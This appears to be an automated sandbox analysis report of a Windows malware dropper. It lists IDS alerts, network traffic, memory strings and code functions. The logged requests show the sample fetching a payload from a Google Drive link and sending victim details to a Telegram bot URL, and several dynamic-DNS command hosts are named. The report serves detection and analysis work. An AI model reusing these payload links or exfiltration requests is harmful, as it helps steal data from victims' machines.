          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49695 -> 193.122.130.0:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.9:49698 -> 104.21.80.1:443
          Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49693 -> 142.250.74.206:443
          Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
          Source: unknown | HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.9:49696 version: TLS 1.0
          Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
          Source: global traffic | HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1 | Host: reallyfreegeoip.org
          Source: global traffic | HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20and%20Time:%2014/03/2025%20/%2011:48:52%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20367706%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 | Host: api.telegram.org | Connection: Keep-Alive
          Source: global traffic | DNS traffic detected: DNS query: drive.google.com
          Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
          Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
          Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
          Source: global traffic | DNS traffic detected: DNS query: api.telegram.org
          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 | Date: Thu, 13 Mar 2025 12:35:03 GMT | Content-Type: application/json | Content-Length: 55 | Connection: close | Strict-Transport-Security: max-age=31536000; includeSubDomains; preload | Access-Control-Allow-Origin: * | Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://aborters.duckdns.org:8081
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://anotherarmy.dns.army:8081
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
          Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
          Source: powershell.exe, 00000001.00000002.1430200400.000000000714F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.m
          Source: svchost.exe, 00000004.00000002.2251563547.0000025204400000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://crl.ver)
          Source: qmgr.db.4.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
          Source: qmgr.db.4.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
          Source: qmgr.db.4.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
          Source: qmgr.db.4.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
          Source: qmgr.db.4.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
          Source: qmgr.db.4.dr | String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
          Source: edb.log.4.dr | String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
          Source: NDQ211216GM08.exe.bin.exe, Nonalined.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020251000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://varders.kozow.com:8081
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org?q=
          Source: powershell.exe, 00000001.00000002.1425106652.00000000049D1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBjr
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:367706%0D%0ADate%20a
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000203D2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=en4
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000203DC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://chrome.google.com/webstore?hl=enlBjr
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
          Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/9A
          Source: Nonalined.exe, 0000000B.00000002.2254544572.00000000040D8000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/qA
          Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254525150.0000000004090000.00000004.00001000.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D
          Source: Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0DRMmf
          Source: Nonalined.exe, 0000000B.00000003.1492131065.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527984035.0000000004183000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527968014.0000000004181000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004143000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.0000000004116000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2254544572.000000000412E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download
          Source: Nonalined.exe, 0000000B.00000003.1492077176.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1527902003.0000000004149000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1i4eTgLwUk9hJ78wr8LAtfXWd1f7g1Q0D&export=download_
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: edb.log.4.dr | String found in binary or memory: https://g.live.com/odclientsettings/Prod-C:
          Source: svchost.exe, 00000004.00000003.1206920172.0000025204600000.00000004.00000800.00020000.00000000.sdmp, edb.log.4.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2-C:
          Source: Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gemini.google.com/app?q=
          Source: powershell.exe, 00000001.00000002.1425106652.0000000004B26000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1428039593.0000000005A36000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
          Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002029D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020335000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.000000002030D000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2269171713.00000000202C7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.ecosia.org/newtab/v20Y&
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
          Source: Nonalined.exe, 0000000B.00000002.2271230112.0000000021564000.00000004.00000800.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000002.2271230112.000000002130F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
          Source: Nonalined.exe, 0000000B.00000003.1475509525.0000000004149000.00000004.00000020.00020000.00000000.sdmp, Nonalined.exe, 0000000B.00000003.1475509525.000000000413C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/
          Source: Nonalined.exe, 0000000B.00000002.2269171713.0000000020412000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/4
          Source: Nonalined.exe, 0000000B.00000002.2269171713.000000002040D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.office.com/lBjr
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknown | Network traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49693 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknown | Network traffic detected: HTTP traffic on port 49698 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49710
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49696
          Source: unknown | Network traffic detected: HTTP traffic on port 49694 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49694
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknown | Network traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknown | HTTPS traffic detected: 142.250.74.206:443 -> 192.168.2.9:49693 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 142.250.186.129:443 -> 192.168.2.9:49694 version: TLS 1.2
          Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.9:49713 version: TLS 1.2
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_004056A8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004056A8

          System Summary

          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\Nonalined.exe
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | Code function: 0_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 0_2_004034F7
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exe | Code function: 11_2_004034F7 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess, 11_2_004034F7
          Source: C:\Users\user\Desktop\NDQ211216GM08.exe.bin.exe | File created: C:\Windows\resources\websiders.ini
          Source: C:\Windows\System32\svchost.exe | File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341E55011_2_2341E550
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341275811_2_23412758
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341A55F11_2_2341A55F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341C56011_2_2341C560
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23417B6911_2_23417B69
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341A57011_2_2341A570
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341577011_2_23415770
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341230011_2_23412300
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341F30011_2_2341F300
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341D30011_2_2341D300
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341D31011_2_2341D310
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341B31011_2_2341B310
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341772011_2_23417720
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341B32011_2_2341B320
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341772211_2_23417722
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341532811_2_23415328
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234197C011_2_234197C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341E9D011_2_2341E9D0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23415BD811_2_23415BD8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341E9E011_2_2341E9E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341C9E011_2_2341C9E0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234115E811_2_234115E8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341C9F011_2_2341C9F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341A9F011_2_2341A9F0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23412FF911_2_23412FF9
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234115F811_2_234115F8
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341F78111_2_2341F781
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341578011_2_23415780
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341D79111_2_2341D791
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341F79011_2_2341F790
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341119F11_2_2341119F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23418FA111_2_23418FA1
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341D7A011_2_2341D7A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234111A011_2_234111A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23412BA011_2_23412BA0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341B7A011_2_2341B7A0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341B7B011_2_2341B7B0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23412BB011_2_23412BB0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234197B011_2_234197B0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23411A4111_2_23411A41
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341004011_2_23410040
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341BC4011_2_2341BC40
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23411A4F11_2_23411A4F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23411A5011_2_23411A50
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23419C5011_2_23419C50
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341345011_2_23413450
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341EE5F11_2_2341EE5F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341346011_2_23413460
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341CE6F11_2_2341CE6F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23416E7011_2_23416E70
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341EE7011_2_2341EE70
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23416E7211_2_23416E72
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23414A7811_2_23414A78
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341647811_2_23416478
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341AE7F11_2_2341AE7F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341AA0011_2_2341AA00
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23416A0711_2_23416A07
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341300811_2_23413008
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23416A1811_2_23416A18
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341DC1F11_2_2341DC1F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341462011_2_23414620
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341FC2011_2_2341FC20
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341602211_2_23416022
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341462211_2_23414622
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341BC2F11_2_2341BC2F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341603011_2_23416030
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23419C3F11_2_23419C3F
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341E0C011_2_2341E0C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_23414EC011_2_23414EC0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_2341C0C011_2_2341C0C0
          Source: C:\Users\user\AppData\Local\Temp\Nonalined.exeCode function: 11_2_234172C811_2_234172C8
